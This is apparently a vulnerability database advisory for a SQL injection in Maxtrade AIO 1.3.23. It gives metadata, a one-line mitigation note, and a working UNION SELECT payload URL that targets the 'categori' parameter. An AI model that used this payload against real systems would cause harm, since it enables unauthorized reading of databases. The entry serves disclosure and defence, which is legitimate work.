Vendor: Maxtrade AIO
By: HaCker_Egy
CVSS: 9 (HIGH)
SQL Injection
CWE: 89
Product Name: Maxtrade AIO
Affected Version From: 1.3.23
Affected Version To: 1.3.23
Patch Exists: NO
Related CWE: N/A
CPE: a:softdivision:maxtrade_aio:1.3.23
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Remote SQL Injection Maxtrade AIO 1.3.23
An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application, with the malicious SQL appended to the vulnerable URL parameter. In the example below, a UNION SELECT is injected through the categori parameter:

www.target.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/*
Mitigation:
Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.